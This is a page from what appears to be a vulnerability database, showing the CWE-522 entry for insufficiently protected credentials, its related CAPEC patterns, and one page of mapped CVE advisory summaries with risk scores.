VYPR

CWE-522

Insufficiently Protected Credentials

ClassIncomplete

Description

The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.

Hierarchy (View 1000)

Related attack patterns (CAPEC)

CAPEC-102 · CAPEC-474 · CAPEC-50 · CAPEC-509 · CAPEC-551 · CAPEC-555 · CAPEC-560 · CAPEC-561 · CAPEC-600 · CAPEC-644 · CAPEC-645 · CAPEC-652 · CAPEC-653

CVEs mapped to this weakness (561)

page 9 of 29
  • CVE-2018-10355HigMay 23, 2018
    risk 0.46cvss 7.0epss 0.01

    An authentication weakness vulnerability in Trend Micro Email Encryption Gateway 5.5 could allow an attacker to recover user passwords on vulnerable installations due to a flaw in the DBCrypto class. An attacker must first obtain access to the user database on the target system…

  • CVE-2018-10327HigMay 17, 2018
    risk 0.46cvss 7.0epss 0.00

    PrinterOn Enterprise 4.1.3 stores the Active Directory bind credentials using base64 encoding, which allows local users to obtain credentials for a domain user by reading the cps_config.xml file.

  • CVE-2017-1764HigApr 23, 2018
    risk 0.46cvss 7.0epss 0.00

    IBM Cognos Business Intelligence 10.2, 10.2.1, 10.2.1.1, and 10.2.2, under specialized circumstances, could expose plain text credentials to a local user. IBM X-Force ID: 136149.

  • CVE-2025-12461MedOct 29, 2025
    risk 0.45cvss epss 0.00

    This vulnerability allows an attacker to access parts of the application that are not protected by any type of access control. The attacker could access this path ‘…/epsilonnet/License/About.aspx’ and obtain information on both the licence and the configuration of the…

  • CVE-2025-10360MedSep 24, 2025
    risk 0.45cvss epss 0.00

    In Puppet Enterprise versions 2025.4.0 and 2025.5, the encryption key used for encrypting content in the Infra Assistant database was not excluded from the files gathered by Puppet backup. The key is only present on the system if the user has a Puppet Enterprise Advanced license…

  • CVE-2025-6081MedJul 1, 2025
    risk 0.44cvss 6.8epss 0.00

    Insufficiently Protected Credentials in LDAP in Konica Minolta bizhub 227 Multifunction printers version GCQ-Y3 or earlier allows an attacker can reconfigure the target device to use an external LDAP service controlled by the attacker. If an LDAP password is set on the target…

  • CVE-2024-51984MedJun 25, 2025
    risk 0.44cvss 6.8epss 0.01

    An authenticated attacker can reconfigure the target device to use an external service (such as LDAP or FTP) controlled by the attacker. If an existing password is present for an external service, the attacker can force the target device to authenticate to an attacker controlled…

  • CVE-2024-44754MedFeb 28, 2025
    risk 0.44cvss 6.8epss 0.00

    Cryptographic key extraction from internal flash in Minut M2 with firmware version #15142 allows physically proximate attackers to inject modified firmware into any other Minut M2 product via USB.

  • CVE-2017-5704MedJul 10, 2018
    risk 0.44cvss 6.7epss 0.00

    Platform sample code firmware included with 4th Gen Intel Core Processor, 5th Gen Intel Core Processor, 6th Gen Intel Core Processor, and 7th Gen Intel Core Processor potentially exposes password information in memory to a local attacker with administrative privileges.

  • CVE-2018-1000404HigJul 9, 2018
    risk 0.44cvss 7.8epss 0.00

    Jenkins project Jenkins AWS CodeBuild Plugin version 0.26 and earlier contains a Insufficiently Protected Credentials vulnerability in AWSClientFactory.java, CodeBuilder.java that can result in Credentials Disclosure. This attack appear to be exploitable via local file access.…

  • CVE-2018-1000401HigJul 9, 2018
    risk 0.44cvss 7.8epss 0.00

    Jenkins project Jenkins AWS CodePipeline Plugin version 0.36 and earlier contains a Insufficiently Protected Credentials vulnerability in AWSCodePipelineSCM.java that can result in Credentials Disclosure. This attack appear to be exploitable via local file access. This…

  • CVE-2018-12260MedJun 12, 2018
    risk 0.44cvss 6.7epss 0.00

    An issue was discovered on Momentum Axel 720P 5.1.8 devices. The root password can be obtained in cleartext by issuing the command 'showKey' from the root CLI. This password may be the same on all devices

  • CVE-2018-1000104HigMar 13, 2018
    risk 0.44cvss 7.8epss 0.00

    A plaintext storage of a password vulnerability exists in Jenkins Coverity Plugin 1.10.0 and earlier in CIMInstance.java that allows an attacker with local file system access or control of a Jenkins administrator's web browser (e.g. malicious extension) to retrieve the…

  • CVE-2017-9969MedFeb 12, 2018
    risk 0.44cvss 6.7epss 0.00

    An information disclosure vulnerability exists in Schneider Electric's IGSS Mobile application version 3.01 and prior. Passwords are stored in clear text in the configuration which can result in exposure of sensitive information.

  • CVE-2017-8371MedApr 30, 2017
    risk 0.44cvss 6.8epss 0.01

    Schneider Electric StruxureWare Data Center Expert before 7.4.0 uses cleartext RAM storage for passwords, which might allow remote attackers to obtain sensitive information via unspecified vectors.

  • CVE-2016-9360MedFeb 13, 2017
    risk 0.44cvss 6.7epss 0.00

    An issue was discovered in General Electric (GE) Proficy HMI/SCADA iFIX Version 5.8 SIM 13 and prior versions, Proficy HMI/SCADA CIMPLICITY Version 9.0 and prior versions, and Proficy Historian Version 6.0 and prior versions. An attacker may be able to retrieve user passwords if…

  • CVE-2026-39908MedJun 8, 2026
    risk 0.42cvss 6.5epss 0.00

    OpenBullet2 through version 0.3.2 on Windows contains a credential disclosure vulnerability that allows remote attackers to capture the NTLMv2 hash of the process user by configuring a job proxy source with a UNC path pointing to an attacker-controlled server. When the job…

  • CVE-2026-49379MedMay 29, 2026
    risk 0.42cvss 6.5epss 0.00

    In JetBrains TeamCity before 2026.1 credentials could be exposed in thread names

  • CVE-2026-0393MedMay 21, 2026
    risk 0.42cvss 6.5epss 0.00

    The affected product may expose credentials remotely between low privileged visualization users during concurrent login operations due to insufficient isolation of authentication data. The vulnerability affects only login operations within an active visualization session.

  • CVE-2026-42367MedMay 4, 2026
    risk 0.42cvss 6.5epss 0.00

    A privilege escalation vulnerability exists in the Web Interface / ssi.cgi functionality of GeoVision LPC2011/LPC2211 1.10. A specially crafted HTTP request can lead to credentials leak. An attacker can visit a webpage to trigger this vulnerability.